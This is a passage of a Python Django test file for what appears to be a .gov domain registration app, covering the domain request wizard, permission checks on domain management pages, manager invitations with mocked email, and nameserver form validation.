\"NYC\"\n org_contact_form[\"organization_contact-state_territory\"] = \"NY\"\n org_contact_form[\"organization_contact-zipcode\"] = \"10002\"\n org_contact_form[\"organization_contact-urbanization\"] = \"URB Royal Oaks\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_result = org_contact_form.submit()\n\n # ---- AO CONTACT PAGE ----\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = org_contact_result.follow()\n self.assertContains(ao_page, \"Executive branch federal agencies\")\n\n # Go back to organization type page and change type\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page.click(str(self.TITLES[\"organization_type\"]), index=0)\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_form[\"organization_type-organization_type\"] = \"city\"\n type_result = type_form.submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n election_page = type_result.follow()\n\n # Go back to AO page and test the dynamic text changed\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = election_page.click(str(self.TITLES[\"authorizing_official\"]), index=0)\n self.assertContains(ao_page, \"Domain requests from cities\")\n\n def test_application_dotgov_domain_dynamic_text(self):\n type_page = self.app.get(reverse(\"application:\")).follow()\n # django-webtest does not handle cookie-based sessions well because it keeps\n # resetting the session key on each new request, thus destroying the concept\n # of a \"session\". We are going to do it manually, saving the session ID here\n # and then setting the cookie on each request.\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n # ---- TYPE PAGE ----\n type_form = type_page.forms[0]\n type_form[\"organization_type-organization_type\"] = \"federal\"\n\n # test next button\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_result = type_form.submit()\n\n # ---- FEDERAL BRANCH PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_page = type_result.follow()\n federal_form = federal_page.forms[0]\n federal_form[\"organization_federal-federal_type\"] = \"executive\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n federal_result = federal_form.submit()\n\n # ---- ORG CONTACT PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_page = federal_result.follow()\n org_contact_form = org_contact_page.forms[0]\n # federal agency so we have to fill in federal_agency\n org_contact_form[\"organization_contact-federal_agency\"] = \"General Services Administration\"\n org_contact_form[\"organization_contact-organization_name\"] = \"Testorg\"\n org_contact_form[\"organization_contact-address_line1\"] = \"address 1\"\n org_contact_form[\"organization_contact-address_line2\"] = \"address 2\"\n org_contact_form[\"organization_contact-city\"] = \"NYC\"\n org_contact_form[\"organization_contact-state_territory\"] = \"NY\"\n org_contact_form[\"organization_contact-zipcode\"] = \"10002\"\n org_contact_form[\"organization_contact-urbanization\"] = \"URB Royal Oaks\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n org_contact_result = org_contact_form.submit()\n\n # ---- AO CONTACT PAGE ----\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = org_contact_result.follow()\n\n # ---- AUTHORIZING OFFICIAL PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_page = org_contact_result.follow()\n ao_form = ao_page.forms[0]\n ao_form[\"authorizing_official-first_name\"] = \"Testy ATO\"\n ao_form[\"authorizing_official-last_name\"] = \"Tester ATO\"\n ao_form[\"authorizing_official-title\"] = \"Chief Tester\"\n ao_form[\"authorizing_official-email\"] = \"testy@town.com\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n ao_result = ao_form.submit()\n\n # ---- CURRENT SITES PAGE ----\n # Follow the redirect to the next form page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_page = ao_result.follow()\n current_sites_form = current_sites_page.forms[0]\n current_sites_form[\"current_sites-0-website\"] = \"www.city.com\"\n\n # test saving the page\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_result = current_sites_form.submit()\n\n # ---- DOTGOV DOMAIN PAGE ----\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_page = current_sites_result.follow()\n\n self.assertContains(dotgov_page, \"medicare.gov\")\n\n # Go back to organization type page and change type\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_page.click(str(self.TITLES[\"organization_type\"]), index=0)\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n type_form[\"organization_type-organization_type\"] = \"city\"\n type_result = type_form.submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n election_page = type_result.follow()\n\n # Go back to dotgov domain page to test the dynamic text changed\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n dotgov_page = election_page.click(str(self.TITLES[\"dotgov_domain\"]), index=0)\n self.assertContains(dotgov_page, \"CityofEudoraKS.gov\")\n self.assertNotContains(dotgov_page, \"medicare.gov\")\n\n def test_application_formsets(self):\n \"\"\"Users are able to add more than one of some fields.\"\"\"\n current_sites_page = self.app.get(reverse(\"application:current_sites\"))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n # fill in the form field\n current_sites_form = current_sites_page.forms[0]\n self.assertIn(\"current_sites-0-website\", current_sites_form.fields)\n self.assertNotIn(\"current_sites-1-website\", current_sites_form.fields)\n current_sites_form[\"current_sites-0-website\"] = \"https://example.com\"\n\n # click \"Add another\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_result = current_sites_form.submit(\"submit_button\", value=\"save\")\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n current_sites_form = current_sites_result.follow().forms[0]\n\n # verify that there are two form fields\n value = current_sites_form[\"current_sites-0-website\"].value\n self.assertEqual(value, \"https://example.com\")\n self.assertIn(\"current_sites-1-website\", current_sites_form.fields)\n # and it is correctly referenced in the ManyToOne relationship\n application = DomainApplication.objects.get() # there's only one\n self.assertEqual(\n application.current_websites.filter(website=\"https://example.com\").count(),\n 1,\n )\n\n @skip(\"WIP\")\n def test_application_edit_restore(self):\n \"\"\"\n Test that a previously saved application is available at the /edit endpoint.\n \"\"\"\n ao, _ = Contact.objects.get_or_create(\n first_name=\"Testy\",\n last_name=\"Tester\",\n title=\"Chief Tester\",\n email=\"testy@town.com\",\n phone=\"(555) 555 5555\",\n )\n domain, _ = Domain.objects.get_or_create(name=\"city.gov\")\n alt, _ = Website.objects.get_or_create(website=\"city1.gov\")\n current, _ = Website.objects.get_or_create(website=\"city.com\")\n you, _ = Contact.objects.get_or_create(\n first_name=\"Testy you\",\n last_name=\"Tester you\",\n title=\"Admin Tester\",\n email=\"testy-admin@town.com\",\n phone=\"(555) 555 5556\",\n )\n other, _ = Contact.objects.get_or_create(\n first_name=\"Testy2\",\n last_name=\"Tester2\",\n title=\"Another Tester\",\n email=\"testy2@town.com\",\n phone=\"(555) 555 5557\",\n )\n application, _ = DomainApplication.objects.get_or_create(\n organization_type=\"federal\",\n federal_type=\"executive\",\n purpose=\"Purpose of the site\",\n anything_else=\"No\",\n is_policy_acknowledged=True,\n organization_name=\"Testorg\",\n address_line1=\"address 1\",\n state_territory=\"NY\",\n zipcode=\"10002\",\n authorizing_official=ao,\n requested_domain=domain,\n submitter=you,\n creator=self.user,\n )\n application.other_contacts.add(other)\n application.current_websites.add(current)\n application.alternative_domains.add(alt)\n\n # prime the form by visiting /edit\n url = reverse(\"edit-application\", kwargs={\"id\": application.pk})\n response = self.client.get(url)\n\n # TODO: this is a sketch of each page in the wizard which needs to be tested\n # Django does not have tools sufficient for real end to end integration testing\n # (for example, USWDS moves radio buttons off screen and replaces them with\n # CSS styled \"fakes\" -- Django cannot determine if those are visually correct)\n # -- the best that can/should be done here is to ensure the correct values\n # are being passed to the templating engine\n\n url = reverse(\"application:organization_type\")\n response = self.client.get(url, follow=True)\n self.assertContains(response, \"\")\n # choices = response.context['wizard']['form']['organization_type'].subwidgets\n # radio = [ x for x in choices if x.data[\"value\"] == \"federal\" ][0]\n # checked = radio.data[\"selected\"]\n # self.assertTrue(checked)\n\n # url = reverse(\"application:organization_federal\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:organization_contact\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:authorizing_official\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:current_sites\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:dotgov_domain\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:purpose\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:your_contact\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:other_contacts\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:other_contacts\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:security_email\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:anything_else\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n # url = reverse(\"application:requirements\")\n # self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # page = self.app.get(url)\n # self.assertNotContains(page, \"VALUE\")\n\n def test_long_org_name_in_application(self):\n \"\"\"\n Make sure the long name is displaying in the application form,\n org step\n \"\"\"\n request = self.app.get(reverse(\"application:\")).follow()\n self.assertContains(request, \"Federal: an agency of the U.S. government\")\n\n def test_long_org_name_in_application_manage(self):\n \"\"\"\n Make sure the long name is displaying in the application summary\n page (manage your application)\n \"\"\"\n completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Edit\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"Federal: an agency of the U.S. government\")\n\n def test_submit_modal_no_domain_text_fallback(self):\n \"\"\"When user clicks on submit your domain request and the requested domain\n is null (possible through url direct access to the review page), present\n fallback copy in the modal's header.\n\n NOTE: This may be a moot point if we implement a more solid pattern in the\n future, like not a submit action at all on the review page.\"\"\"\n\n review_page = self.app.get(reverse(\"application:review\"))\n self.assertContains(review_page, \"toggle-submit-domain-request\")\n self.assertContains(review_page, \"You are about to submit an incomplete request\")\n\n\nclass TestWithDomainPermissions(TestWithUser):\n def setUp(self):\n super().setUp()\n self.domain, _ = Domain.objects.get_or_create(name=\"igorville.gov\")\n self.domain_with_ip, _ = Domain.objects.get_or_create(name=\"nameserverwithip.gov\")\n self.domain_just_nameserver, _ = Domain.objects.get_or_create(name=\"justnameserver.com\")\n self.domain_no_information, _ = Domain.objects.get_or_create(name=\"noinformation.gov\")\n self.domain_on_hold, _ = Domain.objects.get_or_create(name=\"on-hold.gov\", state=Domain.State.ON_HOLD)\n self.domain_deleted, _ = Domain.objects.get_or_create(name=\"deleted.gov\", state=Domain.State.DELETED)\n\n self.domain_dsdata, _ = Domain.objects.get_or_create(name=\"dnssec-dsdata.gov\")\n self.domain_multdsdata, _ = Domain.objects.get_or_create(name=\"dnssec-multdsdata.gov\")\n # We could simply use domain (igorville) but this will be more readable in tests\n # that inherit this setUp\n self.domain_dnssec_none, _ = Domain.objects.get_or_create(name=\"dnssec-none.gov\")\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_dsdata)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_multdsdata)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_dnssec_none)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_with_ip)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_just_nameserver)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_on_hold)\n DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain_deleted)\n\n self.role, _ = UserDomainRole.objects.get_or_create(\n user=self.user, domain=self.domain, role=UserDomainRole.Roles.MANAGER\n )\n\n UserDomainRole.objects.get_or_create(\n user=self.user, domain=self.domain_dsdata, role=UserDomainRole.Roles.MANAGER\n )\n UserDomainRole.objects.get_or_create(\n user=self.user,\n domain=self.domain_multdsdata,\n role=UserDomainRole.Roles.MANAGER,\n )\n UserDomainRole.objects.get_or_create(\n user=self.user,\n domain=self.domain_dnssec_none,\n role=UserDomainRole.Roles.MANAGER,\n )\n UserDomainRole.objects.get_or_create(\n user=self.user,\n domain=self.domain_with_ip,\n role=UserDomainRole.Roles.MANAGER,\n )\n UserDomainRole.objects.get_or_create(\n user=self.user,\n domain=self.domain_just_nameserver,\n role=UserDomainRole.Roles.MANAGER,\n )\n UserDomainRole.objects.get_or_create(\n user=self.user, domain=self.domain_on_hold, role=UserDomainRole.Roles.MANAGER\n )\n UserDomainRole.objects.get_or_create(\n user=self.user, domain=self.domain_deleted, role=UserDomainRole.Roles.MANAGER\n )\n\n def tearDown(self):\n try:\n UserDomainRole.objects.all().delete()\n if hasattr(self.domain, \"contacts\"):\n self.domain.contacts.all().delete()\n DomainApplication.objects.all().delete()\n DomainInformation.objects.all().delete()\n PublicContact.objects.all().delete()\n Domain.objects.all().delete()\n UserDomainRole.objects.all().delete()\n except ValueError: # pass if already deleted\n pass\n super().tearDown()\n\n\nclass TestDomainPermissions(TestWithDomainPermissions):\n def test_not_logged_in(self):\n \"\"\"Not logged in gets a redirect to Login.\"\"\"\n for view_name in [\n \"domain\",\n \"domain-users\",\n \"domain-users-add\",\n \"domain-dns-nameservers\",\n \"domain-org-name-address\",\n \"domain-authorizing-official\",\n \"domain-your-contact-information\",\n \"domain-security-email\",\n ]:\n with self.subTest(view_name=view_name):\n response = self.client.get(reverse(view_name, kwargs={\"pk\": self.domain.id}))\n self.assertEqual(response.status_code, 302)\n\n def test_no_domain_role(self):\n \"\"\"Logged in but no role gets 403 Forbidden.\"\"\"\n self.client.force_login(self.user)\n self.role.delete() # user no longer has a role on this domain\n\n for view_name in [\n \"domain\",\n \"domain-users\",\n \"domain-users-add\",\n \"domain-dns-nameservers\",\n \"domain-org-name-address\",\n \"domain-authorizing-official\",\n \"domain-your-contact-information\",\n \"domain-security-email\",\n ]:\n with self.subTest(view_name=view_name):\n with less_console_noise():\n response = self.client.get(reverse(view_name, kwargs={\"pk\": self.domain.id}))\n self.assertEqual(response.status_code, 403)\n\n def test_domain_pages_blocked_for_on_hold_and_deleted(self):\n \"\"\"Test that the domain pages are blocked for on hold and deleted domains\"\"\"\n\n self.client.force_login(self.user)\n for view_name in [\n \"domain-users\",\n \"domain-users-add\",\n \"domain-dns\",\n \"domain-dns-nameservers\",\n \"domain-dns-dnssec\",\n \"domain-dns-dnssec-dsdata\",\n \"domain-org-name-address\",\n \"domain-authorizing-official\",\n \"domain-your-contact-information\",\n \"domain-security-email\",\n ]:\n for domain in [\n self.domain_on_hold,\n self.domain_deleted,\n ]:\n with self.subTest(view_name=view_name, domain=domain):\n with less_console_noise():\n response = self.client.get(reverse(view_name, kwargs={\"pk\": domain.id}))\n self.assertEqual(response.status_code, 403)\n\n\nclass TestDomainOverview(TestWithDomainPermissions, WebTest):\n def setUp(self):\n super().setUp()\n self.app.set_user(self.user.username)\n self.client.force_login(self.user)\n\n\nclass TestDomainDetail(TestDomainOverview):\n def test_domain_detail_link_works(self):\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"igorville.gov\")\n # click the \"Edit\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"igorville.gov\")\n self.assertContains(detail_page, \"Status\")\n\n def test_domain_detail_blocked_for_ineligible_user(self):\n \"\"\"We could easily duplicate this test for all domain management\n views, but a single url test should be solid enough since all domain\n management pages share the same permissions class\"\"\"\n self.user.status = User.RESTRICTED\n self.user.save()\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"igorville.gov\")\n with less_console_noise():\n response = self.client.get(reverse(\"domain\", kwargs={\"pk\": self.domain.id}))\n self.assertEqual(response.status_code, 403)\n\n def test_domain_detail_allowed_for_on_hold(self):\n \"\"\"Test that the domain overview page displays for on hold domain\"\"\"\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"on-hold.gov\")\n\n # View domain overview page\n detail_page = self.client.get(reverse(\"domain\", kwargs={\"pk\": self.domain_on_hold.id}))\n self.assertNotContains(detail_page, \"Edit\")\n\n def test_domain_detail_see_just_nameserver(self):\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"justnameserver.com\")\n\n # View nameserver on Domain Overview page\n detail_page = self.app.get(reverse(\"domain\", kwargs={\"pk\": self.domain_just_nameserver.id}))\n\n self.assertContains(detail_page, \"justnameserver.com\")\n self.assertContains(detail_page, \"ns1.justnameserver.com\")\n self.assertContains(detail_page, \"ns2.justnameserver.com\")\n\n def test_domain_detail_see_nameserver_and_ip(self):\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"nameserverwithip.gov\")\n\n # View nameserver on Domain Overview page\n detail_page = self.app.get(reverse(\"domain\", kwargs={\"pk\": self.domain_with_ip.id}))\n\n self.assertContains(detail_page, \"nameserverwithip.gov\")\n\n self.assertContains(detail_page, \"ns1.nameserverwithip.gov\")\n self.assertContains(detail_page, \"ns2.nameserverwithip.gov\")\n self.assertContains(detail_page, \"ns3.nameserverwithip.gov\")\n # Splitting IP addresses bc there is odd whitespace and can't strip text\n self.assertContains(detail_page, \"(1.2.3.4,\")\n self.assertContains(detail_page, \"2.3.4.5)\")\n\n def test_domain_detail_with_no_information_or_application(self):\n \"\"\"Test that domain management page returns 200 and displays error\n when no domain information or domain application exist\"\"\"\n # have to use staff user for this test\n staff_user = create_user()\n # staff_user.save()\n self.client.force_login(staff_user)\n\n # need to set the analyst_action and analyst_action_location\n # in the session to emulate user clicking Manage Domain\n # in the admin interface\n session = self.client.session\n session[\"analyst_action\"] = \"foo\"\n session[\"analyst_action_location\"] = self.domain_no_information.id\n session.save()\n\n detail_page = self.client.get(reverse(\"domain\", kwargs={\"pk\": self.domain_no_information.id}))\n\n self.assertContains(detail_page, \"noinformation.gov\")\n self.assertContains(detail_page, \"Domain missing domain information\")\n\n\nclass TestDomainManagers(TestDomainOverview):\n def test_domain_managers(self):\n response = self.client.get(reverse(\"domain-users\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(response, \"Domain managers\")\n\n def test_domain_managers_add_link(self):\n \"\"\"Button to get to user add page works.\"\"\"\n management_page = self.app.get(reverse(\"domain-users\", kwargs={\"pk\": self.domain.id}))\n add_page = management_page.click(\"Add a domain manager\")\n self.assertContains(add_page, \"Add a domain manager\")\n\n def test_domain_user_add(self):\n response = self.client.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(response, \"Add a domain manager\")\n\n def test_domain_user_add_form(self):\n \"\"\"Adding an existing user works.\"\"\"\n other_user, _ = get_user_model().objects.get_or_create(email=\"mayor@igorville.gov\")\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n add_page.form[\"email\"] = \"mayor@igorville.gov\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_result = add_page.form.submit()\n\n self.assertEqual(success_result.status_code, 302)\n self.assertEqual(\n success_result[\"Location\"],\n reverse(\"domain-users\", kwargs={\"pk\": self.domain.id}),\n )\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_page = success_result.follow()\n self.assertContains(success_page, \"mayor@igorville.gov\")\n\n @boto3_mocking.patching\n def test_domain_invitation_created(self):\n \"\"\"Add user on a nonexistent email creates an invitation.\n\n Adding a non-existent user sends an email as a side-effect, so mock\n out the boto3 SES email sending here.\n \"\"\"\n # make sure there is no user with this email\n email_address = \"mayor@igorville.gov\"\n User.objects.filter(email=email_address).delete()\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n add_page.form[\"email\"] = email_address\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_result = add_page.form.submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_page = success_result.follow()\n\n self.assertContains(success_page, email_address)\n self.assertContains(success_page, \"Cancel\") # link to cancel invitation\n self.assertTrue(DomainInvitation.objects.filter(email=email_address).exists())\n\n @boto3_mocking.patching\n def test_domain_invitation_created_for_caps_email(self):\n \"\"\"Add user on a nonexistent email with CAPS creates an invitation to lowercase email.\n\n Adding a non-existent user sends an email as a side-effect, so mock\n out the boto3 SES email sending here.\n \"\"\"\n # make sure there is no user with this email\n email_address = \"mayor@igorville.gov\"\n caps_email_address = \"MAYOR@igorville.gov\"\n User.objects.filter(email=email_address).delete()\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n add_page.form[\"email\"] = caps_email_address\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_result = add_page.form.submit()\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_page = success_result.follow()\n\n self.assertContains(success_page, email_address)\n self.assertContains(success_page, \"Cancel\") # link to cancel invitation\n self.assertTrue(DomainInvitation.objects.filter(email=email_address).exists())\n\n @boto3_mocking.patching\n def test_domain_invitation_email_sent(self):\n \"\"\"Inviting a non-existent user sends them an email.\"\"\"\n # make sure there is no user with this email\n email_address = \"mayor@igorville.gov\"\n User.objects.filter(email=email_address).delete()\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n mock_client = MagicMock()\n mock_client_instance = mock_client.return_value\n with boto3_mocking.clients.handler_for(\"sesv2\", mock_client):\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n add_page.form[\"email\"] = email_address\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n add_page.form.submit()\n # check the mock instance to see if `send_email` was called right\n mock_client_instance.send_email.assert_called_once_with(\n FromEmailAddress=settings.DEFAULT_FROM_EMAIL,\n Destination={\"ToAddresses\": [email_address]},\n Content=ANY,\n )\n\n def test_domain_invitation_cancel(self):\n \"\"\"Posting to the delete view deletes an invitation.\"\"\"\n email_address = \"mayor@igorville.gov\"\n invitation, _ = DomainInvitation.objects.get_or_create(domain=self.domain, email=email_address)\n self.client.post(reverse(\"invitation-delete\", kwargs={\"pk\": invitation.id}))\n with self.assertRaises(DomainInvitation.DoesNotExist):\n DomainInvitation.objects.get(id=invitation.id)\n\n def test_domain_invitation_cancel_no_permissions(self):\n \"\"\"Posting to the delete view as a different user should fail.\"\"\"\n email_address = \"mayor@igorville.gov\"\n invitation, _ = DomainInvitation.objects.get_or_create(domain=self.domain, email=email_address)\n\n other_user = User()\n other_user.save()\n self.client.force_login(other_user)\n with less_console_noise(): # permission denied makes console errors\n result = self.client.post(reverse(\"invitation-delete\", kwargs={\"pk\": invitation.id}))\n self.assertEqual(result.status_code, 403)\n\n @boto3_mocking.patching\n def test_domain_invitation_flow(self):\n \"\"\"Send an invitation to a new user, log in and load the dashboard.\"\"\"\n email_address = \"mayor@igorville.gov\"\n User.objects.filter(email=email_address).delete()\n\n add_page = self.app.get(reverse(\"domain-users-add\", kwargs={\"pk\": self.domain.id}))\n\n self.domain_information, _ = DomainInformation.objects.get_or_create(creator=self.user, domain=self.domain)\n\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n add_page.form[\"email\"] = email_address\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n add_page.form.submit()\n\n # user was invited, create them\n new_user = User.objects.create(username=email_address, email=email_address)\n # log them in to `self.app`\n self.app.set_user(new_user.username)\n # and manually call the on each login callback\n new_user.on_each_login()\n\n # Now load the home page and make sure our domain appears there\n home_page = self.app.get(reverse(\"home\"))\n self.assertContains(home_page, self.domain.name)\n\n\nclass TestDomainNameservers(TestDomainOverview):\n def test_domain_nameservers(self):\n \"\"\"Can load domain's nameservers page.\"\"\"\n page = self.client.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"DNS name servers\")\n\n def test_domain_nameservers_form_submit_one_nameserver(self):\n \"\"\"Nameserver form submitted with one nameserver throws error.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form with only one nameserver, should error\n # regarding required fields\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. form requires a minimum of 2 name servers\n self.assertContains(\n result,\n \"A minimum of 2 name servers are required.\",\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_subdomain_missing_ip(self):\n \"\"\"Nameserver form catches missing ip error on subdomain.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-1-server\"] = \"ns2.igorville.gov\"\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. subdomain missing an ip\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.MISSING_IP)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_missing_host(self):\n \"\"\"Nameserver form catches error when host is missing.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-1-ip\"] = \"127.0.0.1\"\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. nameserver has ip but missing host\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.MISSING_HOST)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_duplicate_host(self):\n \"\"\"Nameserver form catches error when host is duplicated.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form with duplicate host names of fake.host.com\n nameservers_page.form[\"form-0-ip\"] = \"\"\n nameservers_page.form[\"form-1-server\"] = \"fake.host.com\"\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. remove duplicate entry\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.DUPLICATE_HOST)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_whitespace(self):\n \"\"\"Nameserver form removes whitespace from ip.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver1 = \"ns1.igorville.gov\"\n nameserver2 = \"ns2.igorville.gov\"\n valid_ip = \"1.1. 1.1\"\n # initial nameservers page has one server with two ips\n # have to throw an error in order to test that the whitespace has been stripped from ip\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without one host and an ip with 